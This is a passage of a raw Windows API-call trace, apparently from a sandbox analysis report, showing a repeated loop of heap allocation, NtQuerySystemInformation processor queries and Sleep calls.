returned 0x29585b8 [0186.452] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0186.523] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.524] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0186.525] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.525] Sleep (dwMilliseconds=0x110) [0186.530] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0186.531] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0186.531] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.532] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0186.532] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0186.532] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0186.533] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0186.538] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.538] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0186.538] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0186.539] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.539] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0186.540] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.540] Sleep (dwMilliseconds=0x110) [0186.550] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0186.550] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0186.550] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.551] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0186.551] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0186.551] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.552] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0186.552] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0186.552] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.553] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0186.553] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0186.553] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.554] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0186.555] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.555] Sleep (dwMilliseconds=0x110) [0186.622] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0186.622] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0186.623] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.626] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0186.626] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0186.627] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0186.628] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0186.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0186.629] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0186.629] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.630] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0186.630] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.630] Sleep (dwMilliseconds=0x110) [0186.734] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0186.734] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0186.735] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.735] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0186.736] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0186.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0186.737] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0186.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0186.738] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0186.738] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.739] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0186.739] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.739] Sleep (dwMilliseconds=0x110) [0186.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0186.768] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0186.769] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.770] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0186.770] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0186.771] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.774] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0186.775] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0186.775] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.776] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0186.776] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0186.777] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.777] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0186.778] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.813] Sleep (dwMilliseconds=0x110) [0186.969] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0186.969] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0186.970] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.971] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0186.971] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0186.972] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.972] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0186.972] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0186.973] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.973] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0186.973] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0186.974] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.974] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0186.975] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0186.975] Sleep (dwMilliseconds=0x110) [0187.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0187.003] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0187.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.004] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0187.004] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0187.005] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.005] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0187.005] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0187.006] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.006] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0187.006] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0187.007] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.007] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0187.008] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.008] Sleep (dwMilliseconds=0x110) [0187.017] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0187.018] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0187.018] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0187.019] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0187.019] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.019] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0187.020] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0187.020] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.020] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0187.020] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0187.021] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.021] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0187.022] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.022] Sleep (dwMilliseconds=0x110) [0187.042] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0187.042] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0187.042] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.043] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0187.043] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0187.043] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.044] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0187.045] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0187.045] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.045] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0187.045] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0187.046] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.046] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0187.047] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.047] Sleep (dwMilliseconds=0x110) [0187.083] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0187.083] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0187.084] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.084] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0187.085] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0187.085] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.086] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0187.086] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0187.086] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.086] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0187.087] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0187.087] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.088] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0187.089] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.089] Sleep (dwMilliseconds=0x110) [0187.263] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0187.263] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0187.264] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.264] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0187.264] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0187.265] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.265] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0187.266] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0187.266] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.267] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0187.267] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0187.268] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.268] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0187.269] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.269] Sleep (dwMilliseconds=0x110) [0187.357] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0187.357] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0187.357] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.358] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0187.358] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0187.359] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.359] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0187.359] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0187.360] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.360] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0187.360] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0187.361] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.361] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0187.362] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.362] Sleep (dwMilliseconds=0x110) [0187.406] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0187.406] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0187.407] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.407] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0187.408] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0187.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.409] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0187.410] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0187.410] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.411] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0187.411] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0187.412] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.412] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0187.413] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.413] Sleep (dwMilliseconds=0x110) [0187.446] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0187.447] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0187.447] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.448] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0187.448] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0187.449] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0187.449] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0187.449] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, 